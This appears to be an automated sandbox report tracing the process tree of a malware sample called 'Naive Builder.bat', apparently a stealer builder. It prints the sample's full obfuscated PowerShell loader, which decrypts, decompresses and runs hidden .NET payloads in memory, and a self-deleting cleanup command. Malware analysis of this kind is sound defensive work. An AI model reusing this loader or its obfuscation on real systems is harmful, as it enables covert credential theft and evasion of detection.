C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1132
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1272 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3232
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1360
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1596
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3092
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1208
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2332
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2620
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2724
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2776
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3596
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
PID:3636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat"2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2828
-
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"Naive Builder.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function mJkVt($luVLu){ $XURkq=[System.Security.Cryptography.Aes]::Create(); $XURkq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XURkq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XURkq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EJfVxric5nYI0sCifeM7QtCynXluiHdjC3MMcb2UUrA='); $XURkq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IIC8RBkY6uF/2e5D1cUgfg=='); $XhpAT=$XURkq.CreateDecryptor(); $return_var=$XhpAT.TransformFinalBlock($luVLu, 0, $luVLu.Length); $XhpAT.Dispose(); $XURkq.Dispose(); $return_var;}function hLEOv($luVLu){ $SBbXV=New-Object System.IO.MemoryStream(,$luVLu); $RlXKT=New-Object System.IO.MemoryStream; $XPinw=New-Object System.IO.Compression.GZipStream($SBbXV, [IO.Compression.CompressionMode]::Decompress); $XPinw.CopyTo($RlXKT); $XPinw.Dispose(); $SBbXV.Dispose(); $RlXKT.Dispose(); $RlXKT.ToArray();}function tzqfR($luVLu,$MCcIJ){ $VEHZu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$luVLu); $cUkGe=$VEHZu.EntryPoint; $cUkGe.Invoke($null, $MCcIJ);}$flgbs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat').Split([Environment]::NewLine);foreach ($zFvRn in $flgbs) { if ($zFvRn.StartsWith(':: ')) { $TRCCB=$zFvRn.Substring(4); break; }}$YrvSK=[string[]]$TRCCB.Split('\');$xplph=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[0])));$vNzEy=hLEOv (mJkVt ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YrvSK[1])));tzqfR $vNzEy (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));tzqfR $xplph (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Checks computer location settings
- Deletes itself
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3288).WaitForExit();[System.Threading.Thread]::Sleep(5000); function GwNqo($hcWdd){ $GbeQA=[System.Security.Cryptography.Aes]::Create(); $GbeQA.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GbeQA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GbeQA.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw='); $GbeQA.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw=='); $Gzcae=$GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')(); $xZCEn=$Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hcWdd, 0, $hcWdd.Length); $Gzcae.Dispose(); $GbeQA.Dispose(); $xZCEn;}function KdelZ($hcWdd){ $xreea=New-Object System.IO.MemoryStream(,$hcWdd); $tUOxo=New-Object System.IO.MemoryStream; $AlcuH=New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::Decompress); $AlcuH.CopyTo($tUOxo); $AlcuH.Dispose(); $xreea.Dispose(); $tUOxo.Dispose(); $tUOxo.ToArray();}function XnBtD($hcWdd,$vCKUl){ $UUjhO=[System.Reflection.Assembly]::Load([byte[]]$hcWdd); $EYBYD=$UUjhO.EntryPoint; $EYBYD.Invoke($null, $vCKUl);}$GbeQA1 = New-Object System.Security.Cryptography.AesManaged;$GbeQA1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$rwFhy = $GbeQA1.('rotpyrceDetaerC'[-1..-15] -join '')();$uQajJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R8YHI2y3+bfC/arKVq+DpA==');$uQajJ = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ, 0, $uQajJ.Length);$uQajJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ);$ZldVv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zpFbjFR6Q79enMkRg/fV9jGByuCosOL+FFrp1L9Bxrc=');$ZldVv = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZldVv, 0, $ZldVv.Length);$ZldVv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZldVv);$QHSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yRagRVP7Y0yIRGNXut/wRA==');$QHSJO = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QHSJO, 0, $QHSJO.Length);$QHSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($QHSJO);$qPAwu = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3nv1Wa++uJVxc1vWntaKLplXRZxKDFr3uibDxi58OA6akRSWJKPKcLd61SPItlqY0XnMHBGvZkhpIvPUbbKr1oJ6xGwA14S05HTX8ockPubh62StS/uMKKQKA6C1mSEme1GddTODhgWgh94iy7yqk9lk78YqFUUq+TWzEkqK7YPDcKWIjzLdifgPOFrT/1yCRwIptdg6knFTVhsM9mPIS/N6Lrf7aikwoweqvaONhL5z2ZgTc5YSXyNme8h7UD4bIDYpyuHM1cBooljxqM+5vnB+aOUje92456JKGrbTyLLd+ClQQpJx7MbmRzCli54D+d68nATq5QHuaJzPeVnf62Tc9iUqA2/7kiNVK6We8YGHgon3mR5ksIo4U0Fg2hf+GIxQoAgKHnP663gcBFoSoc/gKpL0IpCEsZqRJUfLV8c=');$qPAwu = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qPAwu, 0, $qPAwu.Length);$qPAwu = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qPAwu);$EAKnT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XmPKocLK/8SmKmaO5JmdsA==');$EAKnT = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EAKnT, 0, $EAKnT.Length);$EAKnT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EAKnT);$iskZf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poxV0MP0jpPLCq8Z3pitYA==');$iskZf = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iskZf, 0, $iskZf.Length);$iskZf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iskZf);$Vsxgi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('fMjPiDDtGwwKHRObVzT45g==');$Vsxgi = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Vsxgi, 0, $Vsxgi.Length);$Vsxgi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Vsxgi);$GZsVo = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uCGw99xaYYIE7Jybam7tCw==');$GZsVo = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GZsVo, 0, $GZsVo.Length);$GZsVo = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GZsVo);$VYaHm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZD1IRjg+BO+p2yRt7mUxgQ==');$VYaHm = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VYaHm, 0, $VYaHm.Length);$VYaHm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($VYaHm);$uQajJ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vv8TsP5rPt+SM413bEOWhA==');$uQajJ0 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ0, 0, $uQajJ0.Length);$uQajJ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ0);$uQajJ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pmT31TTl/lRidgabhJZB0Q==');$uQajJ1 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ1, 0, $uQajJ1.Length);$uQajJ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ1);$uQajJ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nHishQEgCf6Wrip0Vd5NBw==');$uQajJ2 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ2, 0, $uQajJ2.Length);$uQajJ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ2);$uQajJ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EHH0aLIupLRmFvkxYHYafA==');$uQajJ3 = $rwFhy.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uQajJ3, 0, $uQajJ3.Length);$uQajJ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uQajJ3);$rwFhy.Dispose();$GbeQA1.Dispose();if (@(get-process -ea silentlycontinue $uQajJ3).count -gt 1) {exit};$cqpVt = [Microsoft.Win32.Registry]::$GZsVo.$Vsxgi($uQajJ).$iskZf($ZldVv);$eimmm=[string[]]$cqpVt.Split('\');$preJB=KdelZ(GwNqo([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[1])));XnBtD $preJB (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$UcUdn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($eimmm[0]);$GbeQA = New-Object System.Security.Cryptography.AesManaged;$GbeQA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GbeQA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GbeQA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4DHD1pC1JAu6pZ5CrHOcpXj6LagYWTnaXobd/lqroSw=');$GbeQA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DauoXLeOSueRq0nIbPJeGw==');$Gzcae = $GbeQA.('rotpyrceDetaerC'[-1..-15] -join '')();$UcUdn = $Gzcae.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UcUdn, 0, $UcUdn.Length);$Gzcae.Dispose();$GbeQA.Dispose();$xreea = New-Object System.IO.MemoryStream(, $UcUdn);$tUOxo = New-Object System.IO.MemoryStream;$AlcuH = New-Object System.IO.Compression.GZipStream($xreea, [IO.Compression.CompressionMode]::$uQajJ1);$AlcuH.$VYaHm($tUOxo);$AlcuH.Dispose();$xreea.Dispose();$tUOxo.Dispose();$UcUdn = $tUOxo.ToArray();$HWqkc = $qPAwu | IEX;$UUjhO = $HWqkc::$uQajJ2($UcUdn);$EYBYD = $UUjhO.EntryPoint;$EYBYD.$uQajJ0($null, (, [string[]] ($QHSJO)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:2872
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3280
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\naive-stealer-main\Naive Builder.bat.exe"5⤵
- Kills process with taskkill
PID:3024
-
-
